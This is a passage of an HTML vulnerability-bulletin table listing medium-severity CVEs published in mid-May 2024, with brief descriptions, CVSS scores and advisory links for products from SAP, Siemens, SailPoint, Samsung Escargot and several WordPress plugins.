<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32733&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32733" target="_blank">CVE-2024-32733</a><br><a href="https://me.sap.com/notes/3450286" target="_blank">cna@sap.com</a><br><a href="https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364" target="_blank">cna@sap.com</a></td>
</tr>
<tr>
<td>SAP_SE--SAP NetWeaver Application server for ABAP and ABAP Platform<br> </td>
<td>SAP NetWeaver Application Server for ABAP and ABAP Platform do not sufficiently encode user controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. An attacker can control code that is executed within a user's browser, which could result in modification, deletion of data, including accessing or deleting files, or stealing session cookies which an attacker could use to hijack a user's session. Hence, this could have impact on Confidentiality, Integrity and Availability of the system.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34687&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34687" target="_blank">CVE-2024-34687</a><br><a href="https://me.sap.com/notes/3448445" target="_blank">cna@sap.com</a><br><a href="https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html" target="_blank">cna@sap.com</a></td>
</tr>
<tr>
<td>SAP_SE--SAP Replication Server <br> </td>
<td>SAP Replication Server allows an attacker to use gateway for executing some commands to RSSD. This could result in crashing the Replication Server due to memory corruption with high impact on Availability of the system.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33008&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">4.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33008" target="_blank">CVE-2024-33008</a><br><a href="https://me.sap.com/notes/3349468" target="_blank">cna@sap.com</a><br><a href="https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html" target="_blank">cna@sap.com</a></td>
</tr>
<tr>
<td>SAP_SE--SAP S/4 HANA (Manage Bank Statement Reprocessing Rules)<br> </td>
<td>Manage Bank Statement ReProcessing Rules does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges. By exploiting this vulnerability, an attacker can enable/disable the sharing rule of other users affecting the integrity of the application. Confidentiality and Availability are not affected.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4138&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4138" target="_blank">CVE-2024-4138</a><br><a href="https://me.sap.com/notes/3434666" target="_blank">cna@sap.com</a><br><a href="https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html" target="_blank">cna@sap.com</a></td>
</tr>
<tr>
<td>SAP_SE--SAP S/4 HANA (Manage Bank Statement Reprocessing Rules)<br> </td>
<td>Manage Bank Statement ReProcessing Rules does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges. By exploiting this vulnerability, an attacker can delete rules of other users affecting the integrity of the application. Confidentiality and Availability are not affected.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4139&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4139" target="_blank">CVE-2024-4139</a><br><a href="https://me.sap.com/notes/3434666" target="_blank">cna@sap.com</a><br><a href="https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html" target="_blank">cna@sap.com</a></td>
</tr>
<tr>
<td>SAP_SE--SAP S/4HANA (Document Service Handler for DPS)<br> </td>
<td>Document Service handler (obsolete) in Data Provisioning Service does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability with low impact on Confidentiality and Integrity of the application.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33002&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33002" target="_blank">CVE-2024-33002</a><br><a href="https://me.sap.com/notes/3460772" target="_blank">cna@sap.com</a><br><a href="https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html" target="_blank">cna@sap.com</a></td>
</tr>
<tr>
<td>SKT Themes--SKT Addons for Elementor<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SKT Themes SKT Addons for Elementor allows Stored XSS.This issue affects SKT Addons for Elementor: from n/a through 1.8.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34436&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34436" target="_blank">CVE-2024-34436</a><br><a href="https://patchstack.com/database/vulnerability/skt-addons-for-elementor/wordpress-skt-addons-for-elementor-plugin-1-8-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>SKT Themes--SKT Addons for Elementor<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SKT Themes SKT Addons for Elementor allows Stored XSS.This issue affects SKT Addons for Elementor: from n/a through 1.8.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34445&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34445" target="_blank">CVE-2024-34445</a><br><a href="https://patchstack.com/database/vulnerability/skt-addons-for-elementor/wordpress-skt-addons-for-elementor-plugin-1-8-cross-site-scripting-xss-vulnerability-2?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>SailPoint--Identity Security Cloud<br> </td>
<td>An improper access control was identified in the Identity Security Cloud (ISC) message server API that allowed an authenticated user to exfiltrate job processing metadata (opaque messageIDs, work queue depth and counts) for other tenants.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3317&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3317" target="_blank">CVE-2024-3317</a><br><a href="https://www.sailpoint.com/security-advisories/" target="_blank">psirt@sailpoint.com</a></td>
</tr>
<tr>
<td>SailPoint--Identity Security Cloud<br> </td>
<td>A file path traversal vulnerability was identified in the DelimitedFileConnector Cloud Connector that allowed an authenticated administrator to set arbitrary connector attributes, including the "file" attribute, which in turn allowed the user to access files uploaded for other sources.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3318&amp;vector=CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">4.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3318" target="_blank">CVE-2024-3318</a><br><a href="https://www.sailpoint.com/security-advisories/" target="_blank">psirt@sailpoint.com</a></td>
</tr>
<tr>
<td>SakuraIsayeki--WOWS-Karma<br> </td>
<td>WOWS Karma is a reputation system for Wargaming's World of Warships. A user is able to click multiple times on "create" on a post creation prompt before the modal closes, which triggers sending several post creation API requests at once. Due to timing, sending multiple posts simultaneously requests bypasses the cooldown validation, however are not refreshing a user's metrics more than once, due to concurrent karma updates. This issue is fixed in 0.17.4.1.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34695&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34695" target="_blank">CVE-2024-34695</a><br><a href="https://github.com/SakuraIsayeki/WOWS-Karma/commit/3210b516fa3551e30fe760c915f7656d9046e69a" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/SakuraIsayeki/WOWS-Karma/commit/6cb825976f28c68d79172aeda00e955bf5853de2" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/SakuraIsayeki/WOWS-Karma/security/advisories/GHSA-v6cc-v976-mj8g" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>Salon Booking System--Salon booking system<br> </td>
<td>Improper Privilege Management vulnerability in Salon Booking System Salon booking system allows Privilege Escalation.This issue affects Salon booking system: from n/a through 8.6.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-48319&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-48319" target="_blank">CVE-2023-48319</a><br><a href="https://patchstack.com/database/vulnerability/salon-booking-system/wordpress-salon-booking-system-plugin-8-7-editor-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Samsung Open Source--Escargot<br> </td>
<td>Improper Input Validation vulnerability in Samsung Open Source escargot JavaScript engine allows Overflow Buffers. However, it occurs in the test code and does not include in the release. This issue affects escargot: 4.0.0.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32669&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32669" target="_blank">CVE-2024-32669</a><br><a href="https://github.com/Samsung/escargot/pull/1326" target="_blank">PSIRT@samsung.com</a></td>
</tr>
<tr>
<td>Samsung Open Source--Escargot<br> </td>
<td>A Segmentation Fault issue discovered in Samsung Open Source Escargot JavaScript engine allows remote attackers to cause a denial of service via crafted input. This issue affects Escargot: 4.0.0.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32672&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32672" target="_blank">CVE-2024-32672</a><br><a href="https://github.com/Samsung/escargot/pull/1322" target="_blank">PSIRT@samsung.com</a></td>
</tr>
<tr>
<td>Samuel Marshall--JCH Optimize<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Samuel Marshall JCH Optimize.This issue affects JCH Optimize: from n/a through 4.2.0.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34808&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34808" target="_blank">CVE-2024-34808</a><br><a href="https://patchstack.com/database/vulnerability/jch-optimize/wordpress-jch-optimize-plugin-4-2-0-path-traversal-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>ShortPixel--ShortPixel Adaptive Images<br> </td>
<td>Server-Side Request Forgery (SSRF) vulnerability in ShortPixel ShortPixel Adaptive Images.This issue affects ShortPixel Adaptive Images: from n/a through 3.8.3.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-35172&amp;vector=CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">4.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35172" target="_blank">CVE-2024-35172</a><br><a href="https://patchstack.com/database/vulnerability/shortpixel-adaptive-images/wordpress-shortpixel-adaptive-images-plugin-3-8-3-server-side-request-forgery-ssrf-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>ShortPixel--ShortPixel Adaptive Images<br> </td>
<td>Cross-Site Request Forgery (CSRF) vulnerability in ShortPixel ShortPixel Adaptive Images.This issue affects ShortPixel Adaptive Images: from n/a through 3.8.3.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4689&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4689" target="_blank">CVE-2024-4689</a><br><a href="https://patchstack.com/database/vulnerability/shortpixel-adaptive-images/wordpress-shortpixel-adaptive-images-plugin-3-8-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>SiAdmin--SiAdmin<br> </td>
<td>Vulnerability in SiAdmin 1.1 that allows XSS via the /show.php query parameter. This vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and thereby steal their cookie session credentials.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4993&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4993" target="_blank">CVE-2024-4993</a><br><a href="https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-siadmin" target="_blank">cve-coordination@incibe.es</a></td>
</tr>
<tr>
<td>Siemens--OPUPI0 AMQP/MQTT<br> </td>
<td>A vulnerability has been identified in OPUPI0 AMQP/MQTT (All versions &lt; V5.30). The affected devices stores MQTT client passwords without sufficient protection on the devices. An attacker with remote shell access or physical access could retrieve the credentials leading to confidentiality loss.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31486&amp;vector=CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31486" target="_blank">CVE-2024-31486</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-871704.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--Polarion ALM<br> </td>
<td>A vulnerability has been identified in Polarion ALM (All versions &lt; V2404.0). The Apache Lucene based query engine in the affected application lacks proper access controls. This could allow an authenticated user to query items beyond the user's allowed projects.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33647&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33647" target="_blank">CVE-2024-33647</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-925850.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--RUGGEDCOM CROSSBOW<br> </td>
<td>A vulnerability has been identified in RUGGEDCOM CROSSBOW (All versions &lt; V5.5). Downloading files overwrites files with the same name in the installation directory of the affected systems. The filename for the target file can be specified, thus arbitrary files can be overwritten by an attacker with the required privileges.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-27946&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27946" target="_blank">CVE-2024-27946</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-916916.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--RUGGEDCOM CROSSBOW<br> </td>
<td>A vulnerability has been identified in RUGGEDCOM CROSSBOW (All versions &lt; V5.5). The affected systems could allow log messages to be forwarded to a specific client under certain circumstances. An attacker could leverage this vulnerability to forward log messages to a specific compromised client.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-27947&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27947" target="_blank">CVE-2024-27947</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-916916.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--S7-PCT<br> </td>
<td>A vulnerability has been identified in S7-PCT (All versions), Security Configuration Tool (SCT) (All versions), SIMATIC Automation Tool (All versions), SIMATIC BATCH V9.1 (All versions), SIMATIC NET PC Software (All versions), SIMATIC PCS 7 V9.1 (All versions), SIMATIC PDM V9.2 (All versions), SIMATIC Route Control V9.1 (All versions), SIMATIC STEP 7 V5 (All versions), SIMATIC WinCC OA V3.17 (All versions), SIMATIC WinCC OA V3.18 (All versions &lt; V3.18 P025), SIMATIC WinCC OA V3.19 (All versions &lt; V3.19 P010), SIMATIC WinCC Runtime Advanced (All versions), SIMATIC WinCC Runtime Professional V16 (All versions), SIMATIC WinCC Runtime Professional V17 (All versions), SIMATIC WinCC Runtime Professional V18 (All versions), SIMATIC WinCC Runtime Professional V19 (All versions), SIMATIC WinCC Unified PC Runtime (All versions), SIMATIC WinCC V7.4 (All versions), SIMATIC WinCC V7.5 (All versions), SIMATIC WinCC V8.0 (All versions), SINAMICS Startdrive (All versions &lt; V19 SP1), SINUMERIK ONE virtual (All versions &lt; V6.23), SINUMERIK PLC Programming Tool (All versions), TIA Portal Cloud Connector (All versions &lt; V2.0), Totally Integrated Automation Portal (TIA Portal) V15.1 (All versions), Totally Integrated Automation Portal (TIA Portal) V16 (All versions), Totally Integrated Automation Portal (TIA Portal) V17 (All versions), Totally Integrated Automation Portal (TIA Portal) V18 (All versions), Totally Integrated Automation Portal (TIA Portal) V19 (All versions &lt; V19 Update 2). The affected applications contain an out of bounds read vulnerability. This could allow an attacker to cause a Blue Screen of Death (BSOD) crash of the underlying Windows kernel.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-46280&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-46280" target="_blank">CVE-2023-46280</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-962515.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--SIMATIC RTLS Locating Manager<br> </td>
<td>A vulnerability has been identified in SIMATIC RTLS Locating Manager (6GT2780-0DA00) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA10) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA20) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA30) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA10) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA20) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA30) (All versions &lt; V3.0.1.1). The "DBTest" tool of SIMATIC RTLS Locating Manager does not properly enforce access restriction. This could allow an authenticated local attacker to extract sensitive information from memory.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30208&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30208" target="_blank">CVE-2024-30208</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-093430.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--SIMATIC RTLS Locating Manager<br> </td>
<td>A vulnerability has been identified in SIMATIC RTLS Locating Manager (6GT2780-0DA00) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA10) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA20) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA30) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA10) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA20) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA30) (All versions &lt; V3.0.1.1). Affected components do not properly authenticate heartbeat messages. This could allow an unauthenticated remote attacker to affected the availability of secondary RTLS systems configured using a TeeRevProxy service and potentially cause loss of data generated during the time the attack is ongoing.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33494&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33494" target="_blank">CVE-2024-33494</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-093430.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--SIMATIC RTLS Locating Manager<br> </td>
<td>A vulnerability has been identified in SIMATIC RTLS Locating Manager (6GT2780-0DA00) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA10) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA20) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA30) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA10) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA20) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA30) (All versions &lt; V3.0.1.1). The affected application does not properly limit the size of specific logs. This could allow an unauthenticated remote attacker to exhaust system resources by creating a great number of log entries which could potentially lead to a denial of service condition. A successful exploitation requires the attacker to have access to specific SIMATIC RTLS Locating Manager Clients in the deployment.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33495&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33495" target="_blank">CVE-2024-33495</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-093430.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--SIMATIC RTLS Locating Manager<br> </td>
<td>A vulnerability has been identified in SIMATIC RTLS Locating Manager (6GT2780-0DA00) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA10) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA20) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA30) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA10) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA20) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA30) (All versions &lt; V3.0.1.1). Affected SIMATIC RTLS Locating Manager Report Clients do not properly protect credentials that are used to authenticate to the server. This could allow an authenticated local attacker to extract the credentials and use them to escalate their access rights from the Manager to the Systemadministrator role.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33496&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33496" target="_blank">CVE-2024-33496</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-093430.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--SIMATIC RTLS Locating Manager<br> </td>
<td>A vulnerability has been identified in SIMATIC RTLS Locating Manager (6GT2780-0DA00) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA10) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA20) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA30) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA10) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA20) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA30) (All versions &lt; V3.0.1.1). Affected SIMATIC RTLS Locating Manager Track Viewer Client do not properly protect credentials that are used to authenticate to the server. This could allow an authenticated local attacker to extract the credentials and use them to escalate their access rights from the Manager to the Systemadministrator role.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33497&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33497" target="_blank">CVE-2024-33497</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-093430.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--SIMATIC RTLS Locating Manager<br> </td>
<td>A vulnerability has been identified in SIMATIC RTLS Locating Manager (6GT2780-0DA00) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA10) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA20) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA30) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA10) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA20) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA30) (All versions &lt; V3.0.1.1). Affected applications do not properly release memory that is allocated when handling specifically crafted incoming packets. This could allow an unauthenticated remote attacker to cause a denial of service condition by crashing the service when it runs out of memory. The service is restarted automatically after a short time.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33498&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33498" target="_blank">CVE-2024-33498</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-093430.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>SourceCodester--Best Courier Management System<br> </td>
<td>A vulnerability was found in SourceCodester Best Courier Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file view_parcel.php. The manipulation of the argument id leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264480.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4945&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4945" target="_blank">CVE-2024-4945</a><br><a href="https://github.com/CveSecLook/cve/issues/28" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264480" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264480" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333960" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>SourceCodester--Employee and Visitor Gate Pass Logging System<br> </td>
